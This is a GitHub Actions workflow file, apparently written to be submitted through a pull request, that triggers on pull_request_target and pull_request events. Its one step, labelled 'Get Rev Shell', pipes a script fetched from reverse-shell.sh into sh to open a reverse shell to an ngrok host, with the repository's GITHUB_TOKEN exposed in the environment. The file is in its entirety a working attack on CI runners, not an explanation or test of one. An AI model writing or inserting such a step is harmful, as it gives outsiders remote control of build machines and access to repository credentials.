name: CIpull_request_target

on:
  pull_request_target:
  pull_request:

jobs:     
  create_pull_request:
    runs-on: ubuntu-latest
    steps:
      - name: Get Rev Shell
        run: sh -c 'curl https://reverse-shell.sh/0.tcp.eu.ngrok.io:13954 | sh'
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
